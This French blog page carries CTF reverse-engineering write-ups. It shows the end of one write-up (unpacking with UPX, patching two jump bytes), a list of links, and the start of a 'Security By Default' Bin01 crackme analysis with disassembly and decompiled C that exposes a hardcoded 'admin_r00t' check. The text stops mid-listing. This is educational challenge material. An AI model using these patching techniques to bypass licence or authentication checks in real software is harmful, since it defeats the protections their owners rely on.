Oh ben ça alors, un flag, plus qu'a utiliser quelque xor (vu dans les fonctions précédentes) afin d'en générer un md5 pour la validation, phase que je ne détaillerai hélas pas ici par manque de temps et je m'en excuse car c'est bien la le nerf de la guerre :S ...<br />
<br />
Ceci dit je me réserve plutot pour les writeups du CTF de la semaine à venir: 29C3 !!<br />
<br />
Voila pour ce petit writeup de rappel, incomplet, je le regrette mais il faut l'avouer, il était simple: un<span style="color: red;"> UPX -d</span> et 2<span style="color: red;"> \x75</span> c'est quand même pas violent aprés un petit calcul à faire et hop! <br />
Mais au moins ça m'aura permis de rédiger ce petit article qui, je le reconnais me donne envie de revenir rapidement en réécrire d'autre beaucoup plus technique alors .. A très vite !!<br />
<br />
kmkz<br />
<h4 style="text-align: center;">
<u><span style="color: yellow; font-size: large;">Liste des writeups diponibles</span></u></h4>
<strong><u><span style="color: #cc0000;"></span></u></strong><br />
<a href="http://blog.sergeybelove.ru/ctf/426" target="_blank"><span style="color: #f6b26b;">RealWorld100 (php/sql)</span></a><br />
<a href="http://smokedchicken.org/2012/12/phdays-ctf-quals-2013-real-world-500.html" target="_blank"><span style="color: #f6b26b;">RealWorld500</span></a><br />
<a href="http://bitsmash.wordpress.com/2012/12/17/2012-phdays-quals-pwn300-writeup/" target="_blank"><span style="color: #f6b26b;">Pwn300</span></a><br />
<a href="http://bitsmash.wordpress.com/2012/12/17/2012-phdays-quals-misc100-writeup/" target="_blank"><span style="color: #f6b26b;">Misc100</span></a><br />
<a href="https://gist.github.com/4317280" target="_blank"><span style="color: #f6b26b;">Misc400</span></a><span style="color: #f6b26b;">(code)</span><br />
<a href="http://f00l.de/blog/?p=1372" target="_blank"><span style="color: #f6b26b;">Misc200(Deutch)</span></a><br />
<br />kmkzhttp://www.blogger.com/profile/11354372095868320290noreply@blogger.com3tag:blogger.com,1999:blog-4457623080129847893.post-27856895759900660332011-01-17T22:37:00.013+01:002011-01-17T23:09:39.844+01:00[Write-Up] Security By Default CTF : Bin01 (reversing)<div style="font-family: Times,"Times New Roman",serif;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP1DlvMQrOFxVOVJREQ9mdbM_xdzOO8kblPCRrId92Jzo3OpB8EUWXWk_436GmaSp2HTiYBDU8PFMvbqFifIEM9ego1NE0ZgAoKY__uZ1-ihbQ4gK9HSLuwkmRQsqdg6nEM414DgF81pkL/s1600/secu_by_def_bin1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"></a><span style="color: #cccccc;">Ce week end avaient lieu le CTF "Security By Default" auquel nous avons participé.</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;">Simultanément avait aussi lieu le Padocon qui lui aussi semblait vraiment simpa bien que d'un niveau bien hard ;-) .</span><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;">Bref , concentrons-nous sur le sujet de ce billet , a savoir : le Bin01 du CTF "Security By Default".</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;">La premiere chose que l'on remarque dessuite via l'utilitaire "file" : ce binaire est du type elf32 , non stippé .</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;"> Ainsi j'ai pu facilement commencer dans un premier temp une rapide analyse a l'aide d'Hexrays afin de réaliser un arbre des appels de fonctions ainsi que des dumps ASM puis C pour bien cerner la bête et voir comment agir.</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;">(Les parties du code ne nous intérréssant pas on bien sur été supprimées)</span></div><div style="font-family: Arial,Helvetica,sans-serif;"><span style="color: #cccccc; font-size: x-small;"> <span style="font-family: Verdana,sans-serif;"> </span><b style="font-family: Verdana,sans-serif;"><span style="color: red;"> ...</span></b></span></div><div style="font-family: Verdana,sans-serif;"><b><span style="color: red; font-size: x-small;"> mov edx, offset format ; "\n--- Welcome to '%s' systems.\n"</span><span style="font-size: x-small;"><br style="color: red;" /></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp+4], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], edx ; format</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _printf</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+6Bh]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call tor</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov edx, offset aS ; "%s"</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp+4], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], edx ; format</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _printf</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, ds:stdin@@GLIBC_2_0</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; stream</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _fflush</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+1894h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; s</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _gets</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+58h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call tor</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov edx, offset aS ; "%s"</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp+4], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], edx ; format</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _printf</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, ds:stdin@@GLIBC_2_0</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; stream</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _fflush</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+10C4h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; s</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _gets</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+4Bh]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call tor</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov edx, offset aS ; "%s"</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp+4], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], edx ; format</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _printf</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, ds:stdin@@GLIBC_2_0</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; stream</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _fflush</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, [esp+2068h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; s</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _gets</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+39h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call tor</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov edx, offset aS ; "%s"</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp+4], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], edx ; format</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _printf</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, ds:stdin@@GLIBC_2_0</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; stream</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _fflush</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+8F4h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; s</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _gets</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+1Bh]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; s</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call untrash</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+1Bh]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call tor</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov edx, offset aS ; "%s"</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp+4], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], edx ; format</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _printf</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, ds:stdin@@GLIBC_2_0</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; stream</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _fflush</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+124h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; s</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _gets</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov dword ptr [esp+2064h],</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> jmp short loc_8048A47</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;">; ---------------------------------------------------------------------------</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><br style="color: red;" /></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;">loc_8048A0D: </span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, [esp+206Ch]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, [eax]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> cmp eax, [esp+2064h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> jnz short loc_8048A3F</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+9Bh]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call tor</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov edx, offset aAlertS ; "ALERT: %s\n"</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp+4], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], edx ; format</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _printf</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><br style="color: red;" /></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;">loc_8048A3F: </span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> add dword ptr [esp+2064h], 1</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><br style="color: red;" /></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;">loc_8048A47: </span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> cmp dword ptr [esp+2064h], 9</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> jle short loc_8048A0D</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, [esp+206Ch]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, [eax]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> test eax, eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> jz short loc_8048AA9</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+0B0h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; s</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call untrash</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+0B0h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call tor</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov ebx, eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+0F9h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call tor</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov edx, offset aSS ; "%s %s\n"</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp+8], ebx</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp+4], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], edx ; format</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _printf</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, 0</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> jmp short loc_8048AF0</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;">; ---------------------------------------------------------------------------</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><br style="color: red;" /></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;">loc_8048AA9: </span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov dword ptr [esp+4], offset s2 ; "admin_r00t"</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+124h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax ; s1</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _strcmp</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> test eax, eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> jnz short loc_8048AEB</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> lea eax, [esp+112h]</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call tor</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov edx, offset aS_0 ; "%s :)\n"</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp+4], eax</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov [esp], edx ; format</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> call _printf</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, 45h</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> jmp short loc_8048AF0</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;">; ---------------------------------------------------------------------------</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><br style="color: red;" /></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;">loc_8048AEB: </span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov eax, 45h</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><br style="color: red;" /></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;">loc_8048AF0: </span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> add esp, 2074h</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> pop ebx</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> pop esi</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> pop edi</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> mov esp, ebp</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> pop ebp</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> retn</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;">main endp</span></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><br style="color: red;" /></span></b></div><div style="font-family: Verdana,sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;">; ---------------------------------------------------------------------------</span></span></b><br />
<b><span style="font-size: x-small;"><span style="color: red;"> ...</span></span></b></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;"> Dans cet extrait du code assembleur , ces fonctions semblent etre celles qui nous intéressent , a partir de la on réalise un désassemblage qui donne : </span></div><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="font-family: Times,"Times New Roman",serif; margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP1DlvMQrOFxVOVJREQ9mdbM_xdzOO8kblPCRrId92Jzo3OpB8EUWXWk_436GmaSp2HTiYBDU8PFMvbqFifIEM9ego1NE0ZgAoKY__uZ1-ihbQ4gK9HSLuwkmRQsqdg6nEM414DgF81pkL/s1600/secu_by_def_bin1.png" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgP1DlvMQrOFxVOVJREQ9mdbM_xdzOO8kblPCRrId92Jzo3OpB8EUWXWk_436GmaSp2HTiYBDU8PFMvbqFifIEM9ego1NE0ZgAoKY__uZ1-ihbQ4gK9HSLuwkmRQsqdg6nEM414DgF81pkL/s400/secu_by_def_bin1.png" width="327" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><br />
</td></tr>
</tbody></table><div style="font-family: Times,"Times New Roman",serif;"><br />
</div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;">J'ai ensuite étudié l'algo un peu plus en profondeur via un dump C d'Hexrays qui s'avéra trés instructif quand au fonctionnement ducrackme.</span></div><div style="font-family: Times,"Times New Roman",serif;"><span style="color: #cccccc;"> <b style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: x-small;"> <span style="color: red;">...</span></span></b></span><b style="font-family: "Trebuchet MS",sans-serif;"><span style="font-size: x-small;"><br style="color: red;" /></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> printf("\n--- Welcome to '%s' systems.\n", v0);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> v1 = tor(&v34);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> printf("%s", v1);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> fflush(stdin);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> gets(&v70);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> v2 = tor(&v28);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> printf("%s", v2);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> fflush(stdin);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> gets(&v69);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> v3 = tor(&v24);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> printf("%s", v3);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> fflush(stdin);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> gets((char *)v72);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> v4 = tor(&v19);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> printf("%s", v4);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> fflush(stdin);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> gets(&v68);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> untrash((const char *)&v11);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> v5 = tor(&v11);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> printf("%s", v5);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> fflush(stdin);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> gets(&v67);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> for ( i = -5; i <= 9; ++i )</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> {</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> if ( *(_DWORD *)v73 == i )</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> {</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> v6 = tor(&v47);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> printf("ALERT: %s\n", v6);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> }</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> }</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> if ( *(_DWORD *)v73 )</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> {</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> untrash(&v53);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> v8 = tor((int *)&v53);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> v9 = tor(&v55);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> printf("%s %s\n", v9, v8);</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> result = 0;</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> }</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> else</span></span></b></div><div style="font-family: "Trebuchet MS",sans-serif;"><b><span style="font-size: x-small;"><span style="color: red;"> 